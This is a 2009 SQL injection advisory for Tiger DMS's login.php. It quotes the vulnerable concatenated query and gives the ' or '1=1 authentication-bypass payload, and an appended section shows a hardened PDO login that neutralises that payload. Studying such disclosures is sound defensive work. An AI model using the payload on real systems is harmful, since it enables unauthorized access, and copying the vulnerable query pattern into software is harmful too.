Tiger DMS (Auth Bypass) Remote SQL Injection Vulnerability

2009-05-02 / 2009-05-03
Credit: h4ckf0ru
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

==============================================================================
                                 DOS DZ TEAM
==============================================================================
-------------------------------------
[+] Home: http://www.tigerdms.com/download.php
Product: Tiger DMS
home: www.h4ckf0ru.com
Note: I tested it on localhost because the demo was not working :)
-------------------------------------
Tiger DMS (auth Bypass) SQL Injection Vulnerabilities
-------------------------------------

File:
-----
Login.php

Vuln:
----
    if (isset($r_username)){
        $selog = mysql_query("SELECT * FROM $prefix"."users where username='$r_username' and password='$r_password'");
        $num_rows = mysql_num_rows($selog);
        if ($num_rows == 1){
            $nona=mysql_fetch_array($selog);
            $_SESSION["aut"] = $nona["type"] ;
            $_SESSION["nick"] = $nona["username"];
            $_SESSION["name"] = $nona["name"];
            $_SESSION["id"] = $nona["id"];
            header("Location: index.php");

exploit:
--------
http://localhost/[path]/login.php
username: ' or '1=1
Password: ' or '1=1

--------------------------------------------------
Greetz to:
[+] Super_Cristal (My Master)
    Dos-Dz Team
    Snakes TeaM
    SuB-ZeRo
    x.CJP.x
    Mr.tro0oqy
    - Cyber-Zone -
    ZoRLu
    -ViRuS_Dz
    And ALL Members Of anti-intruders.org
    ALL My Friends (Dz)
[+]-------------------------------------[+]
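
The login check above builds its query by pasting $r_username and $r_password into the SQL string, so a quote in either field changes the WHERE clause. The following is an added example of a hardened form of that check, not Tiger DMS code and not from the advisory's author. It assumes PDO with the sqlite driver (in-memory database for the demo), a password_hash column in place of the plaintext password column, a constructed tdms_ table prefix, and a hypothetical helper named authenticate().

```php
<?php
declare(strict_types=1);
// Added example: hardened login lookup. Names below are assumptions, not
// Tiger DMS code: authenticate(), the tdms_ prefix, the password_hash column.

function authenticate(PDO $db, string $prefix, string $user, string $pass): ?array
{
    // Identifiers cannot be bound as parameters, so validate the prefix.
    if (!preg_match('/^[A-Za-z0-9_]*$/', $prefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }
    // Values are bound, never concatenated: a quote in $user stays data.
    $stmt = $db->prepare(
        "SELECT id, username, name, type, password_hash
           FROM {$prefix}users WHERE username = :u"
    );
    $stmt->execute([':u' => $user]);
    $rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
    // Require exactly one row, and verify the password against its hash
    // in PHP instead of comparing plaintext inside the SQL statement.
    if (count($rows) !== 1 || !password_verify($pass, $rows[0]['password_hash'])) {
        return null;
    }
    unset($rows[0]['password_hash']);
    return $rows[0];
}

// Constructed sample data for the demo.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tdms_users (id INTEGER PRIMARY KEY, username TEXT UNIQUE,
           name TEXT, type TEXT, password_hash TEXT)');
$ins = $db->prepare('INSERT INTO tdms_users (username, name, type, password_hash)
                     VALUES (?, ?, ?, ?)');
$ins->execute(['admin', 'Administrator', 'admin',
               password_hash('S3cret!pw', PASSWORD_DEFAULT)]);

// The advisory's input is looked up as a literal username and matches no row.
var_dump(authenticate($db, 'tdms_', "' or '1=1", "' or '1=1"));

// A valid login returns the row the session variables would be filled from.
$row = authenticate($db, 'tdms_', 'admin', 'S3cret!pw');
var_dump($row !== null && $row['type'] === 'admin');
```

On a successful return the caller would regenerate the session ID before setting the $_SESSION values.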

